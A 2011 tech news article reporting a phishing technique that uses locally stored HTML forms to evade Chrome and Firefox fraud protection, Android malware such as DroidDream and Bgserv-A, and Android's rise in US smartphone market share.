New security flaw discovered in Chrome and Firefox
March 17, 2011
Recent events of some phishing attacks targeting customers of PayPal and of Bank of America were successful in circumventing fraud protections integrated in the Mozilla Firefox and Google Chrome browsers by attaching an HTML file to the spam email.
According to M-86 researcher Rodel Mendrez, the locally-stored file opens up a Web form that collects the customers' user ID and password, credit card numbers and other sensitive and personal information. It then uses a simple POST request to illegally send that data to a PHP application on a legitimate website that's been compromised.
By avoiding the use of "verbose GET requests' and known phishing sites, the scam works completely under the radar of these browsers' built in fraud protection mechanisms.
“And while the POST request sends information to the phisher's remote Web server, Google Chrome and Mozilla Firefox didn't detect any malicious activity. As a result, months-old phishing campaigns remain totally undetected, so it seems that the tactic is very effective,” Mendrez explained.
There's really no technical reason why the browsers can't flag the URL that accepts the POST request. Mendrez suggested that few PHP URLs get reported as abusive by most end users because of the technical expertise that is required in similar attacks.
However, with not visible HTML code accompanying the files, there's little to see for the average user to go on, resulting in the phishing attack to work as intended.
The technique is very similar to another one reported my M86 in February that embedded self-extracting archive files in phishing emails and also used compromised legitimate websites to bypass anti-phishing protections.
As an example, junk food maker Frito Lay was one of the companies whose websites was hacked to host the PHP script, Mendrez says. The malicious program has since been removed, Frito Lay reported.
There was no mention how Microsoft's Internet Explorer browser responds to the HTML forms, but it's fairly easy to assume that it may also present some Internet security issues as well, given Microsoft's history when it comes to security concerns on many of its software products.
In other security news, a group of virus and malware makers have released a new Trojan version of an Android clean-up tool released by Google earlier this week.
Google offered a new security update, a sort of a 'kill switch' that purged the DroidDream Trojan from infected mobile handsets just last weekend.
However, the DroidDream Trojan virus found its way onto the official Android marketplace, typically under the disguise of mobile games, using an exploit to infect an estimated 50,000 phones. The use of the exploit meant that the attack was effective against Google Android smartphones, even if they weren't jailbroken.
In a swift response, Google immediately pulled all the games from the marketplace. That stopped further infections from spreading but still failed to help eradicate the infection from already compromised mobile handsets, hence the decision to push an over-the-air update-- theAndroid Market Security Tool.
But sneaky 'V-Xers' have developed a back-doored version of this clean-up tool, dubbed 'Bgserv-A' by Internet security firms, and released through third-party Android marketplaces.
The Bgserv-A virus actually lifts the IMEI and the phone number from compromised handsets, uploading this information to a remote hacker-controlled server, much like the original Trojan.
And further analysis suggests that the Bgserv-A worm is also targeting users of Google's smartphones in China as well, where the sheer number of units can cause even more havoc and to a greater number of users.
Infection is likely to lead to high data usage on infected devices, as well as posing a privacy risk. Built in functionalities in the malware also create a means to send SMS and text messages from infected devices as well, under instructions from a command-and-control remote server that can be located anywhere in the cloud.
A complete and detailed report of the malware can be found in blog posts on the Symantec website.
In other Android news, according to a new report released Tuesday from market research firm comScore, Google's Android operating system is now the most-used smartphone OS in the United States. This represents a fast race to the top from a platform that didn't even exist a little over two years ago.
About 31.3 percent of all smartphones in the United States ran Google's Android OS in January, says comScore. That outpaced the 30.5 percent of American smartphone owners who use RIM's BlackBerry phones.
The near 'rocket rise' of Android began in late October 2008, when HTC's G1 phone went on sale for T-Mobile USA users. The platform really started to take off when the Motorola Droid went on sale in November 2009. Google's mobile OS began in 2010 with just a small 7 percent share of the smartphone market, but Android has grown by an astounding two percentage points each month since. And the trend continues.
Android was in fourth place as recently as May 2010, but it outpaced Microsoft's Windows Mobile in June. In November, Android overtook Apple's iOS, which runs on the iPhone, iPod Touch and iPad. It finally conquered the mighty BlackBerry OS in the first month of 2011, easily surpassing an operating system that had more than a 42 percent share of the U.S. smartphone market barely a year ago.
Today, about 350,000 Android devices are activated each day, and there are more than 170 smartphones and tablets running Android, according to Google.
Overall, most of Android's spectacular success can be attributed up to Google's open business licensing model. Google licenses its mobile OS for free, allowing wireless handset manufacturers to load the ready-made software onto their phones instead of paying a team of engineers to develop a proprietary platform.
Not only that, but they can also customize it and make as many modifications as needed as well. It's based on the open source concept, very much like the Linux operating system is.
So far, LG Electronics, HTC Corp, Samsung, Motorola and dozens of other mobile handset makers have jumped onto the Android bandwagon, and the overall ability and ease to focus exclusively on the hardware allowed device manufacturers to start bringing new phones to market much more quickly.
In fact, the time it takes smartphones to go from concept to store shelves has been halved thanks to "Android's new law," say some wireless industry observers that are close to Google.
Globally, Android beat BlackBerry last year, but it still trails Nokia's Symbian OS, according to Gartner. Nokia recently announced that it would drop its Symbian OS, which has been rapidly losing market share, for Microsoft's Windows Phone OS.
Nokia CEO Stephen Elop acknowledged that he had considered partnering with Google, but he said that Windows Phone offered more differentiation amid a sea of new Android devices.
At a press conference in London last month, Nokia CEO Stephen Elop and Microsoft's Steve Ballmer announced that Nokia will abandon its Symbian and Meego operating systems to instead adopt Microsoft's Windows Phone 7 OS. Windows Phone 7 will become the predominating operating system for Nokia smartphones from now on.
Most wireless industry observers agree that the strategy is a drastic one meant to fend off the growing momentum by mobile competitors Google's Android operating system and Apple's iOS.
You can link to the Internet Security web site as much as you like.